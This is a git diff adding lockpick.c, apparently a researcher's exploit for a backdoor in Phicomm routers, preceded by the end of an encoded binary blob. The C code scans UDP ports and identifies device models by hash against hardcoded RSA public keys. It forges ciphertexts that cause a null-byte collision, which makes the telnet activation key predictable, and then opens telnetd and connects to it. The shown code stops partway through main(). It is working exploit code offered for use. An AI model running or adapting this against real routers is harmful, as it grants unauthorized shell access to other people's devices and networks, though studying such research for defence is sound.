z>zAVvS3n^a_5(+l@S=o)@1B@y8LH`~sc#Voh{U!R%4EX*#4U?Dz*~w}!{|!m&65S7
zKzMT;{uI`p$jwU;X?80qdKMeO&08ixjUB28Dz6L|RqH}5gpyUq%FCu{5x-7ymP{$Y
zrr22==5*EdYVWmDFbZEQ<I7V_RI)Q@?zJ-0>sqmaS-n)d1`^!G!o%KiwpJDN-cTU4
zMTkW64z*}XufQ4j?D~iNMoe%OyyK*Z&9;4|pBXe~o<w~_xuhutv;<31Z_r<iV-k@w
zwy9DDozoJ(re_{@mvZXKsE_Vvt^@m|Qx-w1=7{7_J)u&Itn*Fu>^`^}&`Cr~a6WX<
zioY{%C_!7vU4QE`Z+IFpp5o0a@7Au{8=-Ubn7N6^*tkfyDN5KhG*cymv8|~oCyq{Y
zu6O3fUZfgNA!wEQ<Cund?jk>FC)fF{r8CN}m=1(5KXarO02*GkXMCnuQN-;ij^<U5
zv`^P=zK$#9wJ;}?vydNgOzKe?$WXDXZiYnMtU<#A`37~`jnwXp8^KWtj0MKM5LQ}j
zRT3%+b|(2mljkx3lSCq>MK6bz7&>jl1zO(K`RQarR3qsKVk$J{F8+*qw1p#1)9Q(E
zA)B`KP+M+%6$OH0&XgA)ww(AN9L(#j<b#)Gam?5vF{nS#MTohVIy#q^Lfdn*J`c|P
zWG#9T>h7zDFTdT{v2LN-rHyMjKUAYHWho`Uj9B|5jiG~rWjCq8APfhY_EKqi8o+?y
zA>uN_a1X=VXK#?k1h5c8AB-a!ym_h2mKH^b*^UWEqdlR%ucTJ?cQoNKQ7pPxmevuI
zffd^{5_@WzCq*liAyVP7@Sq{e!Go@}g~Fg3rWG!LVl&?@ss42s+`AeSY&UvC3rj3|
z0jUSV3-F3u7UlvZHi7!Ui0<v6@U4jK^!1(tTD}7Cg|jzN8jje8R9>%Q6Jvv8-P$bl
zR{uIAi4cVu9Fya00_XzI0L2UnV0vDDKDS8``FP?x&D5frlsEd9K3LD%*p1DV8_9=J
z9%ncp8|6bWKhLi&=nsxS^Uj8p4h*N_G#gz)UdeXEki)M?*zgbC`e&IS3GQ(aRpw)i
z^vp$XDI#YV86D>HG>xpKHqx|t2>ATAsSOZR&#oN6#UGb!>0R*?veh#-qYj)CwFa`~
z;UWJ)a%yLDxy4@{Qzb)S&}+AHX_V7h-?*Nx!DjTPWu%x%<ejHOYFf5EjRmuhkm%~5
zjP4-7?B<82fzXh|V;7k+Ul?Y*L_<a1s&+%BG&Xu2Ywf-3XAO0FM`4}+4)wuP(jCpo
zTdr?mg{C@R3h(qaJ6ANWh8KGU%5?gA<nL&vnp~P}>4B&$Gn13F(wOYHw`F~7XBi=3
zFTK5ua4atXOezIC8T^d_NcM#!e^&)TxT3bU%pq8r#GqfTjP%wx1viO6<T#v^26eiJ
zOtS%r)XW?e*e6~Ba0Z*raI3{(oz`OQ0v+$C)o9%mjM5&Xnm#4b;?FU%t2anI)9=ve
zTzhDwIPK6yl0?DFB!Xl(VtcDnfa73NW#L^LRK_4K_P5WX3^m9>xsDWaL9I|zh6;i}
zY$ZN&6DE~aV%E2~zP`I#agc^OY?RGBIJrK{YA=YWFooZ1DpLnnMI4MISqyd-8QGrw
z$2KW5oE&u=lA|rAtksD!ZM167A1-PpNDVHb_I=A^PwVBWYINgqH>D$<4etE9%2f=&
ziduoG<U?jxTY<qk+1Df%n6s*DA3<%cR`?U*V6f2*;Z`&6Ov6OvQLavw-Nq56(DJ#G
z(4lgxz_vZTPML)RClnnl6zy=NeWnd(1!VyQ&<7WYQ9hu_u2qA!I6UdzKVLSqu%Y5J
zF#**%ImDnX!sewTxGF(7ZSzK(1TZ4tg?f-hTY4jjhe}F!h3Zx#ytlq;2#ru`3TrKs
z7(zL925hTY2)<d~9Inn+9~I^qjl#CFRJ=pozsE89aDd4P%rw(E*dGaEhF6cL9nLub
znG^E+Dvpiev1j9X1755X1L7nu?=>9VdMPHWeFq&%F{Ol%c)L(#rA%HuU>b;XPjbT$
zT;TQKz#Z#x;n<T;%#&$S^@Hs$R(Nk6`zonbH6RY;L{L&kZ_|{@_8{?<%&BIVa5uVn
zQsL`|SCw_?;t)}oq_9H<*fJ7`UA6P=V1ve{lyTBQ9y>p^Fl(I7E42=}fPo;t?ed7z
z(p*OxrHNBW3CI{*QK0eQ?dx+5ZasMixFq?G58ZXRufuP0<qxrl^`iv4CzLj64l70|
ze7XEcL|3jHsmN&+x9@a0f=%`$;fx}es|^2wQfYStGshU3UIu4MJB<}}d*8_;<xEw>
zud0?N1E$AnVWCk`5)U*c%?<SEv0%4K#gkh<Yvw|7t)S`W*Qa_#iG^q~N`XkXRTY%9
z(JZ3;jws6>{H<7nnZUEI%e%8mYehY=!C+art<i5*jpos>VCEhh5e!>7E9CBkrkLcg
zQazo{tyWQv$}V~pwu_o`D<7^_ql62(94S!uP39xXXgjN!tmR;hkvLw|xKNOr)|%Q=
z2t!xFKfzbwuAIiDijsw^%vE-wA0X^ldH^j!l|cgo2ZWnOwcbEr9SFtEgV=12jKgAK
zxM%er!JlDKj*am*4qKIv-ZoRr@P=Y{?VO;h!&zx1>i{8Gj7!4q;JX5v_Gps$ttZdb
z4JoMUi)(10%D!J;o@0tsg2qIiXKiOXG_#@dJo01#*&!!yPi4r7Y><9KbkFQG$;RlF
zh=HkWa5}^5(sG(gyuMH%>}VMI$~po6P=!?(=+;rOi}=Is*~=pt9GB!r<%eSd1ZJyJ
z3i)Gn78Z?UQ#yMoIAo+eEo558CI9055msbeOX16BO%iX34ydAOUBjbZ?WkXk6Oyc$
zdeOm&Wnbwjo4DLoLEr3rGlidkiYKoHE8kr`blz6lZkGAjZ(cwvLK2M94{XenR!2|?
zG`WVtcm}%`Gv#gp)!-ja>ShpygXWj8mo;$|wpcO2Jw>a&+Sz^S0ePB^oy_2ozinxT
zf##5k^1^AUx96PTMB{Hb5-3KjGt&tmH~;V;Oxu+PdL5{cvmPPg?^(lsMr*JO{y=>S
zPReb^V^oab+FZ$T)xIPIv}MA!&eR@g?EH}0ku4{I7gUz||Jn2Hooq1hK{Z{CNYAMk
zEk-oim-C8BlS8fRM#vj!lj+Db&y58s4Gd%pRynexSs&fi>}GmP_H~Un+NS#lNbXWX
z;K>U_mw08Ov<<JN;!8sWO7zl@iK%4P*zbF9(~V5cK_SrDdZljC@walw9z1-aLs3DF
zDYcEF#?2Uy&}^=Q-l`SaFSBXx^+!jn@LfCdhbF=mso5DDm35)a!>mS&*p?~mtD~#k
zqn}@ki6&t}Fj2KxUS$iONBpj@98mAEW#<ut768EzsFMrP;;_N?r$4BiRa|zgDHA=z
zwhpyY$5Jz?<al%^d4gsE#b(|M9D_D^eXSwh)&_uS5&<Ma;!O8gtD}$^GCQ`%7^e`f
zQeay>z0ImvLy9UqLc~=-26{>JhI7PBKSKz}&tnq^=6RA0@uXKtTJ~~nUS>>*Uk|i5
zo?odloj85Jl|VQfC6^qj=1xzUQ=0mkLlvs%gmN=ngHTJ(EZdC9SqH1@iwl)Q$yjWB
z=p`X3LN^Z^$6xFlk5;SRIM=(YU33<Z6b+JJ*VIvKN@KF0osvP9D8KAGRU@}|ii-sY
z0)hl75$FntN1nYzg^<Iwkb_>j!U>U7^$UY_MB*EMM>9qVJoy6KnLR|=<qA(E0-?B#
z_`{$LTH&aVtlJ!>0~py5UTWbCXvfq6f_8@O<JIc==<>nY;jVjmqU;p3hn2bVp*MZX
zUwHGYqiaQphVHSxNO(79&UrIsCh#?<CF@iSRfld@IA5{U52EEZMu_F66lq;71F@)Z
zf?})zP7yWnOK~Cx<d|h~9-v=pVjz~NjFr_?h+0k}!2g#MZ7V*PY!}9eId$U61ffku
z5Q;yJi;>kFU|mlWWGXI!Hdo3zwn{i357XuqP2Q40gwVA9Qzbo@duJanrX!J;&$gP!
zS81xLAkhPZn(Tdv-}#~~2MDi?e6@p{0a21h!~NKjAj6lK65k&vPxx+s#xD>hCEa6k
z&JC#`NS3nZ-V@SDrzy~faIfAkkZSsNZNhSMJ$WDM25`+vCA%VR<-W1s7U=e$iSP;v
z7$W$JDHk>S!P^r}A-m^-o;{q1aV3hs*XaV=JKN4(Mf*;2+5J#Zx@yB~8XeBCY!W(t
zxA(KmM%F>^Nwhgj)(XQqDI(Sf4HCPYvTQ`(3919Blo&OzJSKTdPpdcO=rxDE%Rp_l
zj&?*GtH7YkRhV8?yyNzQGJkF{#dID`xMa$@+asE!ymK86>h!t%w>$=m4){g#eqNy>
z8GChko{{M$f0rtXzBx7{Yec)GySGKlMbrWr+HtipO#JxbjA*ofnFtQCN99Ud<i&95
z=X9tvK4YM>^g=wY1~6fn-AD>fhydtj!lHUpkOwdi%z$D@kIM(MW`|G4<g?*=ZN0Z_
zqbRxglznhsFxk_u9{C^@1-CW#pF##7m)bbp(8N+FyVnIkS+9y(sRlv{K!@4TRHPu%
zQC43JL43B8fq^y=A7|O$&&I)8zD%0o#8et<A%-gmmbmlgpq-2cOlBIi9aI<@2VV+H
zohC{=J8jy!ju1`ldW!;|TFfSm^N~%_uAyj=R0<Eo!7goTF5Gt8XbI#98Mz{hi?$t`
z2d4F?m#l5_y`s6fHeeMhW&fkYAX+CCFP<?7F8hIvhReHs30i@!O5LbU@O_Z;{z@L*
z!O8L#ia{@g=iyy@aiNp-Fo3ijb1=hv^RTpP*u;Q~6H}(^VGD~pijJ#GPXDUB#Q&bu
zC$IAk0pP`*WBswXb9s)1xVUq4BAG|Y!5ywqBiW_e=6p?k=DIr?Ev#D>cV3_C3Hr~S
z3!M~oCmx}xZHqgc;HAD=eRs5fty!V!m47XPmw#Fz)ld8TB9i*W$B^YOxsZ5*mfo&W
zX@6dlk6rwK{_k(;{y(Ar|CxHukA5va{V4wVQ}uoR%eCYG{<i)Y@BdNW|D(MBfB(ln
zJ6^uXuiJNjcXt0T|NdA0?U#Q)?)&53|M&C$KUq)wMclvmMcn_-zMHQ2$8}x)`-T4H
zin{-|zkKXpe*4Qm?|=WpznR|u=lpH|&#&s^U()|;oqza8zwRIZ@W1~B|2x0F{;q$&
z(N%wWxc`sx{y+MEy#F_KFDtC~FaBq|fAK%!{lEBQ_J26L{}<1n=$pmj7r*+;{<qfY
zKlGpZ->3R+^8Ocb|Kiu;{$HsZ^WVC^{=J;t|Kq&>$9exh{p-^Q{CN83;)DL?S+)P)
zJC67N?sxJ2-}{@>8-6_fbMX)LH|yV+eP8$g<JtE`4fXFo$@^!QEjE5L-v5i)4|Dqe
zm!G)*N8iW&e-#ED{#Wm<ul}_@%)jHezq5+_@BZn!GX9-k`|tGi{5!6E`9ALdagb5m
ze9N`}{+92!_`^Sn`{!^iymJlz`%n5m@1I}yyLtaF{Y9?o|EsmuzyDc3)#rZIV)1YP
zdA$F>jbGk!?SH-HJ8t=%e-Zcp4u1^)o8ymnm+TlWTm0H@$Nm51U&ZSFhJO5Czts7s
v_yQ?Yv^(DaEB^qgvRM4Rzc$_7^smL@ujrcF?%&=<sw@_N;Q#jj%<um{Vj!65

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/lockpick.c b/Phicomm/backdoor-lockpick_tra-2022-01/lockpick.c
new file mode 100644
index 0000000..03cc8ff
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/lockpick.c
@@ -0,0 +1,831 @@
+#include <stdio.h>
+#include <sys/time.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <netinet/in.h>
+#include <openssl/bn.h>
+#include <openssl/md5.h>
+#include <openssl/rsa.h>
+
+#define SCAN_DELAY  300000
+#define STAGE_DELAY 80000
+#define DELAY_INCREMENT 2000
+#define DELAY_DECREMENT 1000
+#define BACKDOOR_PORT 21210
+#define TELNET_PORT 23
+#define PLAINTEXT_LENGTH 0x20
+#define CIPHERTEXT_LENGTH 0x80
+#define MAX_TRIES 2048
+
+#define NO_FLAGS 0
+#define WIPE() { memset(plaintext, 0, PLAINTEXT_LENGTH+1); memset(ciphertext, 0, CIPHERTEXT_LENGTH); }
+
+
+
+
+void print_from(struct sockaddr_in *from) {
+  char *ns;
+  ns = inet_ntoa(from->sin_addr);
+  fprintf(stdout, "[<] remote address %s:%d\n", ns, ntohs(from->sin_port) & 0xFFFF);
+  return;
+}
+
+/////// Hexdump code
+
+void fhexdump(FILE *fd, unsigned char *data, int len) {
+  int i;
+  for (i = 0; i < len; i++) {
+    if (i % 16 == 0) {
+      fprintf(fd, "\n");
+    } else if (i % 8 == 0) {
+      fprintf(fd, "  ");
+    } else {
+      fprintf(fd, " ");
+    }
+    fprintf(fd, "%02x", data[i]);
+  }
+  fprintf(fd, "\n\n");
+}
+
+
+void hexdump(unsigned char *data, int len) {
+  fhexdump(stdout, data, len);
+}
+
+
+void bar(char ch) {
+  int i;
+  for (i = 0; i < 65; i++) {
+    putc(ch, stdout);
+  }
+  putc('\n', stdout);
+  return;
+}
+
+
+////// MD5 Code
+
+int md5raw(unsigned char *out, const unsigned char *in, int len) {
+  MD5_CTX c;
+  MD5_Init(&c);
+  MD5_Update(&c, in, len);
+  MD5_Final(out, &c);
+  return 0;
+}
+
+unsigned char *device_identifying_hash(const char *identifier) {
+  unsigned char buffer[0x80];
+  unsigned char *hash;
+  hash = calloc(16, sizeof(char));
+  memset(buffer, 0, 0x80);
+  strcpy((char *) buffer, identifier);
+  md5raw(hash, (const unsigned char *) buffer, 0x80);
+  return hash;
+}
+
+////// RSA stuff
+
+RSA *init_rsa(const char *public_n, const char *public_e) {
+  BIGNUM *e;
+  BIGNUM *n;
+  RSA *rsa;
+  rsa = RSA_new();
+  n = BN_new();
+  e = BN_new();
+  BN_hex2bn(&n, public_n);
+  BN_hex2bn(&e, public_e);
+  rsa->e = e;
+  rsa->n = n;
+  return rsa;
+}
+
+
+int decrypt_with_pubkey(RSA *rsa, unsigned char *ciphertext, unsigned char *plaintext) {
+  int sz;
+  memset(plaintext, 0, PLAINTEXT_LENGTH);
+  sz = RSA_size(rsa);
+  //fprintf(stderr, "[-] RSA_size(rsa) = %d\n", sz);
+  return RSA_public_decrypt(sz, ciphertext, plaintext, rsa, RSA_NO_PADDING);
+}
+
+
+int encrypt_with_pubkey(RSA *rsa, unsigned char *plaintext, unsigned char *ciphertext) {
+  int sz;
+  memset(ciphertext,0,CIPHERTEXT_LENGTH);
+  sz = RSA_size(rsa);
+  fprintf(stderr, "[-] RSA_size(rsa) = %d\n", sz);
+  return RSA_public_encrypt(sz, plaintext, ciphertext, rsa, RSA_NO_PADDING); 
+}
+
+
+
+//// Network code
+
+int communicate(char *ip_addr, 
+    unsigned int port,
+    unsigned char *msg, 
+    unsigned int msg_len, 
+    unsigned char *resp,
+    unsigned int resp_len,
+    long int recv_timeout) {
+
+
+  int sockfd;
+  size_t n;
+  unsigned int len;
+  //struct timeval tv;
+  //tv.tv_sec =  recv_timeout / 1000000;
+  //tv.tv_usec = recv_timeout % 1000000;
+
+  n = 0;
+
+  struct sockaddr_in server_addr;
+  memset(&server_addr,0,sizeof(struct sockaddr_in));
+  struct sockaddr_in server_resp_addr;
+  memset(&server_resp_addr, 0, sizeof(struct sockaddr_in));
+
+  sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
+  if(sockfd == -1){
+    puts("[x] Failed to create socket. Fatal.");
+    exit(1);
+  }
+  
+
+
+  // Set address information
+  server_addr.sin_family = AF_INET;
+  server_addr.sin_addr.s_addr = inet_addr(ip_addr);
+  server_addr.sin_port = htons(port);
+  
+/*
+int envelope_len = 0x80;
+  unsigned char envelope[envelope_len];
+  memset(envelope, 0, envelope_len);
+  memcpy(envelope, msg, msg_len);
+  */
+  printf("[>] Sending 0x%x-byte message to %s on UDP port %d:\n", msg_len, ip_addr, port);
+  hexdump(msg, msg_len);
+
+  sendto(sockfd, (const char*) msg, msg_len, NO_FLAGS, 
+      (const struct sockaddr *) &server_addr,
+      sizeof(server_addr));
+
+  printf("[>] Message sent.\n");
+
+
+  if (resp_len > 0) {
+    printf("[-] Expecting %d bytes in reply...\n", resp_len);
+    //printf("[-] Setting socket timeout to %lds + %ldus\n", tv.tv_sec, tv.tv_usec);
+    //setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
+    
+    // Here we might want to read from the socket in chunks, without
+    // blocking indefinitely...
+    //
+    n = recvfrom(sockfd, resp, resp_len, NO_FLAGS,
+        (struct sockaddr *) &server_resp_addr, &len);
+
+    print_from(&server_resp_addr);
+
+    printf("\n[<] Received %ld bytes in reply:\n", n);
+    hexdump(resp, n);
+  }
+
+  close(sockfd);
+
+  return n;
+}
+
+
+
+int check_tcp_port(char *ip_addr, int port) {
+  int sockfd;
+
+  printf("[>] Checking TCP port %d on %s...\n", port, ip_addr);
+
+  /* KLUDGE 
+  char *telnet_command;
+  telnet_command = malloc(0x80 * sizeof(char));
+  sprintf(telnet_command, "telnet %s %d", ip_addr, port);
+  printf("[>] Using system(\"%s\") as a kludge...\n", telnet_command);
+  return !system(telnet_command);
+
+  */
+
+  sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+  if(sockfd == -1){
+    puts("[x] Failed to create socket. Fatal.");
+    exit(1);
+  }
+  struct sockaddr_in server_addr;
+  memset(&server_addr,0,sizeof(struct sockaddr_in));
+
+  // Set address information
+  server_addr.sin_family = AF_INET;
+  server_addr.sin_addr.s_addr = inet_addr(ip_addr);
+  server_addr.sin_port = htons(port);
+  if (connect(sockfd,(struct sockaddr *) &server_addr,sizeof(server_addr)) < 0) {
+    printf("[x] TCP port %d on %s is closed.\n", port, ip_addr);
+    close(sockfd);
+    return 0;
+  } else {
+    printf("[!] TCP port %d on %s is open.\n", port, ip_addr);
+    close(sockfd);
+    return 1;
+  }
+}
+
+
+struct DeviceList {
+  unsigned char *hash;
+  const char *identifier;
+  const char *public_n;
+  const char *public_e;
+  struct DeviceList *next;
+};
+
+
+struct DeviceList * add_entry_to_device_list(struct DeviceList *DL, 
+    const char *identifier,
+    const char *public_n,
+    const char *public_e) {
+  struct DeviceList * node;
+  node = DL;
+
+  unsigned char buffer[0x80];
+  memset(buffer, 0, 0x80);
+  
+  if (node->identifier != NULL) {
+    // first, find the end of the list:
+    for (node = DL; node->next != NULL; node = node->next) {
+      if (!strcmp(node->identifier, identifier)) {
+        printf("[-] %s already appears in device list.\n", identifier);
+        return node;
+      }
+    }
+
+    // The empty cell is now at node->next
+    node->next = malloc(sizeof(struct DeviceList));
+    memset(node->next, 0, sizeof(struct DeviceList));
+    node = node->next;
+  }
+
+  node->identifier = strdup(identifier);
+  node->hash = device_identifying_hash(identifier);
+  node->public_n = strdup(public_n);
+  node->public_e = public_e;
+
+  printf("[+] Added device to list:\n"
+      "    - identifier: %s\n"
+      "    - public_n: 0x%s\n"
+      "    - public_e 0x%s\n"
+      "    - hash:\n",
+      identifier,
+      public_n,
+      public_e);
+  hexdump(node->hash, 16);
+
+  return node;
+}
+
+
+struct DeviceList * lookup_device_hash(struct DeviceList *DL, unsigned char *hash) {
+  struct DeviceList *node; 
+  node = DL;  
+  for (node = DL; node != NULL; node = node->next) {
+    if (!memcmp(hash, node->hash, 16)) {
+      printf("[+] Found matching hash. Identifier: %s\n", node->identifier);
+      return node;
+    }
+  }
+  return NULL;
+}
+
+struct DeviceList * lookup_device_name(struct DeviceList *DL, char *name) {
+  struct DeviceList *node;
+  for (node = DL; node != NULL; node = node->next) {
+    if (!strcmp(name, node->identifier)) {
+      printf("[+] Found matching name: %s\n", node->identifier);
+      return node;
+    }
+  }
+  return NULL;
+}
+
+
+#define FALLBACK "the old key"
+
+struct DeviceList * init_device_list() {
+  struct DeviceList *DL;
+  DL = (struct DeviceList *) malloc(sizeof(struct DeviceList));
+  memset(DL, 0, sizeof(struct DeviceList));
+
+  add_entry_to_device_list(DL,
+    "K2_COSTDOWN__VER_3.0",
+    "E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD7"
+    "24AFA7063CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B38"
+    "8451D38F3C6650CDB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7"
+    "AF52829E9F858691",
+    "010001");
+
+  add_entry_to_device_list(DL,
+    "K3C_INTELALL_VER_3.0",
+    "E7FFD1A1BB9834966763D1175CFBF1BA2DF53A004B62977E5B985DFFD6D43785E5BCA088A6417BAF"
+    "070BCE199B043C24B03BCEB970D7E47EEBA7F59D2BE4764DD8F06DB8E0E2945C912F52CB31C56C83"
+    "49B689198C4A0D88FD029CCECDDFF9C1491FFB7893C11FAD69987DBA15FF11C7F1D570963FA3825B"
+    "6AE92815388B3E03",
+    "010001");
+
+  add_entry_to_device_list(DL,
+    FALLBACK,
+    "CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FA"
+    "E43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316"
+    "C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6"
+    "CC124D9ED309A519",
+    "010001");
+
+
+  return DL;
+}
+
+
+
+struct DeviceList * probe_udp_port(struct DeviceList *DL, 
+    char *ip_addr, 
+    int port, 
+    unsigned char *token, 
+    int token_len) {
+  int n;
+  unsigned int len;
+  unsigned char buffer[0x80];
+  struct DeviceList *device_info;
+
+  memset(buffer, 0, 0x80);
+  
+  int sockfd, res;
+  struct sockaddr_in server_addr;
+  memset(&server_addr,0,sizeof(struct sockaddr_in));
+
+  sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
+
+  // Set address information
+  server_addr.sin_family = AF_INET;
+  server_addr.sin_addr.s_addr = inet_addr(ip_addr);
+  server_addr.sin_port = htons(port);
+  
+  printf("[-] Probing UDP port %d on %s...\n", port, ip_addr);
+  //hexdump(token, token_len);
+
+  res = sendto(sockfd, (const char*) token, token_len, NO_FLAGS, 
+      (const struct sockaddr *) &server_addr,
+      sizeof(server_addr));
+
+  usleep(SCAN_DELAY);
+
+  if (res < 0) {
+    printf("[x] sendto() failed.\n");
+    return NULL;
+  }
+
+  n = recvfrom(sockfd, buffer, 1, MSG_PEEK|MSG_DONTWAIT,
+      (struct sockaddr *) &server_addr,
+      &len);
+
+  if (n < 1) {
+    printf("[-] no response on port %d\n", port);
+    return NULL;
+  }
+
+  printf("[+] response incoming...\n");
+
+  memset(buffer, 0, 0x80);
+
+  n = recvfrom(sockfd, buffer, 16, MSG_WAITALL,
+      (struct sockaddr *) &server_addr,
+      &len);
+  printf("[+] Received %d bytes in reply to token on UDP port %d:\n", n, port);
+  hexdump(buffer, n);
+  if (n == 16) {
+    device_info = lookup_device_hash(DL, buffer);
+    return device_info;
+  }
+
+  close(sockfd);
+
+  return NULL; 
+}
+
+//// Exploit
+
+#define PHONY_CIPHERTEXT_LENGTH 0x80
+
+
+// What if we add this constraint: the phony ciphertext should begin
+// with the ephemeral password?
+// That way it won't really matter if we fall out of sync!
+void random_buffer(unsigned char *buf, int len) {
+  FILE *urandom;
+  urandom = fopen("/dev/urandom", "rb");
+  fread(buf, sizeof(unsigned char), len, urandom);
+  fclose(urandom);
+  return;
+}
+
+
+#define NULL_COLLISION 1
+#define OLD_WAY 2
+
+void find_phony_ciphertext(RSA *rsa,
+  unsigned char *phony_ciphertext,
+  unsigned char *phony_plaintext,
+  unsigned char *prefix,
+  int prefix_len,
+  int mode
+  ) {
+
+  memset(phony_ciphertext, 0, CIPHERTEXT_LENGTH);
+  memset(phony_plaintext, 0, CIPHERTEXT_LENGTH);
+  int plaintext_length;
+  int tries = 0;
+  do {
+    tries++;
+
+    random_buffer(phony_ciphertext, CIPHERTEXT_LENGTH);
+    phony_ciphertext[0] || (phony_ciphertext[0] |= 1);
+    if (prefix_len) {
+      memcpy(phony_ciphertext, prefix, prefix_len);
+    }
+
+    if (rsa == NULL) {
+      // If we don't have the public key, we can still try just
+      // throwing random buffers at the target and see what
+      // sticks.
+      printf("[-] We don't have a matching public key for this target\n"
+          "    so we'll just throw random buffers at it and see what sticks.\n"
+          "    returning:\n");
+      hexdump(phony_ciphertext, CIPHERTEXT_LENGTH);
+      return;
+    }
+    plaintext_length = decrypt_with_pubkey(rsa, phony_ciphertext, phony_plaintext); 
+    // If the first character of phony_plaintext is printable, then
+    // there is a chance it will collide with the first character of
+    // the secret, random string. Since the phony_plaintext will be
+    // XORed with the random string, this will produce a null byte at
+    // offset 0. And THIS will cause the string concatenation
+    // operation that's used to produce the telnet activation keys
+    // to append an EMPTY STRING to the salt/suffix. And this will
+    // make the MD5 hash of the secret predictable.
+    int len_as_str = strlen((char *) phony_plaintext);
+    if (mode == NULL_COLLISION && (plaintext_length < 0x101) && 
+        (0x21 <= phony_plaintext[0]) && 
+        (phony_plaintext[0] < 0x7f) &&
+        (len_as_str < plaintext_length)) {
+      printf("[!] Found valid Stage II payload in %d attempts:\n", tries);
+      hexdump(phony_ciphertext, CIPHERTEXT_LENGTH);
+      printf("[=] Decrypts to (%d bytes, strlen %d):\n", plaintext_length, len_as_str);
+      hexdump(phony_plaintext, plaintext_length);
+      return;
+    } else if (mode == OLD_WAY && (len_as_str < plaintext_length)) {
+      printf("[!] Found valid phony ciphertext after %d attempts:\n", tries);
+      printf("[=] Decrypts to (%d bytes, strlen %d):\n", plaintext_length, len_as_str);
+      hexdump(phony_plaintext, plaintext_length);
+    }
+  } while (1);
+}
+
+
+void status(char *stage, int on_try, int tries, int stage_delay, float ratio, char *modetext) {
+
+    bar('=');
+    printf("[*] ENTERING STAGE %s (round %d/%d) (d: %d, rr: %.2f%%) IN %s\n", 
+        stage,
+        on_try, tries,
+        stage_delay,
+        ratio,
+        modetext);
+    bar('=');
+}
+
+int main(int argc, char **argv) {
+  unsigned char ciphertext[CIPHERTEXT_LENGTH];
+  unsigned char plaintext[PLAINTEXT_LENGTH+1];
+  RSA *rsa;
+  rsa = NULL;
+  WIPE();
+
+  if (argc == 1) {
+    printf("[?] Usage: %s <ip addr>\n", argv[0]);
+    printf("    Set environment variable BACKDOOR_LEGACY for legacy mode.\n");
+    printf("    Set environment variable BACKDOOR_SALT to PERM or TEMP (default), to\n"
+           "    enable telnetd on a PERManent or TEMPorary basis.\n");
+    exit(1);
+  }
+  
+  /** The exploit **/
+
+  char *ip_addr = argv[1]; 
+  const char *handshake_token = "ABCDEF1234";
+  unsigned char phony_ciphertext[CIPHERTEXT_LENGTH];
+  unsigned char phony_plaintext[CIPHERTEXT_LENGTH];
+  unsigned char backdoor_key[16];
+  char magic_salt[6]; // = "+TEMP";
+  char *salt_var;
+  salt_var = getenv("BACKDOOR_SALT");
+  if (salt_var == NULL) {
+    salt_var = "TEMP";
+  }
+  snprintf(magic_salt, 6, "%s", salt_var);
+  printf("[+] Using magic salt \"%s\"\n", magic_salt);
+  int temp_mode;
+  temp_mode = strcmp(magic_salt, "TEMP") == 0;
+  printf("[+] temp_mode = %d\n", temp_mode);
+  int legacy_mode;
+  int no_secret_mode = 0;
+  legacy_mode = getenv("BACKDOOR_LEGACY") != NULL;
+  no_secret_mode = getenv("BACKDOOR_NO_SECRET") != NULL;
+  char *modetext;
+  if (legacy_mode) {
+    modetext = "LEGACY MODE";
+  } else if (no_secret_mode) {
+    modetext = "NO SECRET MODE";
+  } else {
+    modetext = "ULTIMATE MODE";
+  }
+  unsigned char buffer[CIPHERTEXT_LENGTH];
+  int tries = MAX_TRIES;
+  char *telnet_command;
+  struct timeval timecheck;
+  long int start;
+  long int elapsed;
+  int number_of_ports_to_scan;
+  int i;
+  int *ports_to_scan;
+  int backdoor_port;
+
+  int stage_delay = STAGE_DELAY;
+  struct DeviceList *device_list;
+  struct DeviceList *device_info;
+  device_list = init_device_list();
+
+  if ((argc < 3) || strcmp(argv[2], "scan")) {
+    number_of_ports_to_scan = 1;
+    ports_to_scan = NULL;
+    if (argc < 3) {
+      backdoor_port = 21210;
+    } else {
+      backdoor_port = atoi(argv[2]);
+    }
+  } else {
+    number_of_ports_to_scan = argc - 3;
+    ports_to_scan = calloc(number_of_ports_to_scan, sizeof(int));
+    int p = 0;
+    for (i = 3; i < argc; i++) {
+      // check to see if a range is given
+      char *upper, *lower;
+      int upper_port, lower_port;
+      lower = strtok(argv[i], "-");
+      upper = strtok(NULL, "-");
+      lower_port = atoi(lower);
+      if (upper != NULL) {
+        printf("[+] Found range delimiter in %s\n", argv[i]);
+        int *ports_to_scan_new;
+        upper_port = atoi(upper);
+        printf("[+] lower = %d, upper = %d\n", lower_port, upper_port);
+        number_of_ports_to_scan += (upper_port - lower_port);
+        ports_to_scan_new = calloc(number_of_ports_to_scan, sizeof(int));
+        memcpy(ports_to_scan_new, ports_to_scan, p * sizeof(int));
+        free(ports_to_scan);
+        ports_to_scan = ports_to_scan_new;
+        int P;
+        for (P = lower_port; P <= upper_port; P++) {
+          printf("[+] Adding port %d to scan list\n", P);
+          ports_to_scan[p] = P;
+          p++;
+        }
+      } else {
+        printf("[+] Adding port %d to scan list\n", lower_port);
+        ports_to_scan[p] = lower_port;
+        p++;
+      }
+    }
+  }
+
+
+  char *telnet_port_str;
+  telnet_port_str = getenv("BACKDOOR_TELNET_PORT");
+  int telnet_port = telnet_port_str ? atoi(telnet_port_str) : 23;
+
+  telnet_command = malloc(0x80 * sizeof(char));
+  sprintf(telnet_command, "telnet %s %d", ip_addr, telnet_port);
+  
+  if (temp_mode && check_tcp_port(ip_addr, telnet_port)) {
+    printf("[!] The back door is already open! Why not killall telnetd and try again?\n");
+    system(telnet_command);
+    printf("[*] Have a nice day.\n");
+    exit(0);
+  }
+
